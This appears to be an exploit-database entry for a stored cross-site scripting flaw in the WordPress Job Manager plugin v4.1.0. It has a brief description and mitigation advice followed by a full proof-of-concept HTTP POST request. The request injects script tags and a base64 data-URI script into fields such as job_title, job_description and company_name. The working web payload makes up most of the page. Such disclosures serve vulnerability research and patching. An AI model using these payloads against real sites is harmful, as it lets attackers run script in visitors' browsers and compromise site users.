header-logo
Suggest Exploit
vendor:
Job Manager Plugin
by:
Berk Dusunur & Selimcan Ozdemir
7.5
CVSS
HIGH
Stored Cross Site Scripting
79
CWE
Product Name: Job Manager Plugin
Affected Version From: v4.1.0
Affected Version To: v4.1.0
Patch Exists: NO
Related CWE:
CPE: a:wordpress:wp_job_manager:4.1.0
Metasploit:
Other Scripts:
Platforms Tested: Parrot OS, WinApp Server
2018

WordPress Plugin Job Manager v4.1.0 Stored Cross Site Scripting

The Job Manager plugin for Wordpress version 4.1.0 is vulnerable to stored cross site scripting. An attacker can inject malicious script code through the 'job_title' and 'job_description' fields, which will be executed when a user views the job listing. This can lead to unauthorized access, data theft, or further compromise of the website.

Mitigation:

The vendor has not released a patch for this vulnerability. It is recommended to update to the latest version of the plugin or disable it until a patch is available. Additionally, input validation and output encoding should be implemented to prevent cross site scripting vulnerabilities.
Source

Exploit-DB raw data:

# Exploit Title: Wordpress Plugin Job Manager v4.1.0 Stored Cross Site
Scripting
# Google Dork: N/A
# Date: 2018-07-15
# Exploit Author: Berk Dusunur & Selimcan Ozdemir
# Vendor Homepage: https://wpjobmanager.com
# Software Link: https://downloads.wordpress.org/plugin/wp-job-manager.latest-stable.zip
# Affected Version: v4.1.0
# Tested on: Parrot OS / WinApp Server
# CVE : N/A

# Proof Of Concept


POST
/post-a-job/?step=%00foymtv%22%20method=%22post%22%20id=%22submit-job-form%22%20class=%22job-manager-form%22%20enctype=%22multipart/form-data%22%3E%3Cscript%3Ealert(%271%27)%3C/script%3E%3Cform%20action=%22/post-a-job/?step=%00foymtv
HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:59.0) Gecko/20100101
Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
https://target/post-a-job/?step=%00foymtv22%20method=%22post%22%20id=%22submit-job-form%22%20class=%22job-manager-form%22%20enctype=%22multipart/form-data%22%3E%3Cscript%3Ealert(%271%27)%3C/script%3E%3Cform%20action=%22/post-a-job/?step=%00foymtv
Content-Type: multipart/form-data;
boundary=---------------------------3756777582569023921817540904
Content-Length: 2379
Cookie: wp-job-manager-submitting-job-id=88664;
wp-job-manager-submitting-job-key=5ae8875580aff
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="job_title"

teertert</p></body><script>alert('1')</script>
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="job_description"

test</p></div></div><form input=""><p></p><script>alert('1')</script><a
href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">test</a>
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="job_region"

184
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="job_type"

2
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="application"

www.google.com
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="job_location"

Adelaide, Australia
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="company_name"

teertert</p></body><script>alert('1')</script>
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="company_tagline"

teertert</p></body><script>alert('1')</script>
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="company_website"

www.google.com
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="company_logo"; filename=""
Content-Type: application/octet-stream


-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="company_poster_name"

teertert</p></body><script>alert('1')</script>
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="company_poster_email"

xssiletarihyazilmaz@gmail.com
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="job_manager_form"

submit-job
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="job_id"

0
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="step"


-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="submit_job"

Preview
-----------------------------3756777582569023921817540904--

Navigation

Suggest Exploit

Services By CQR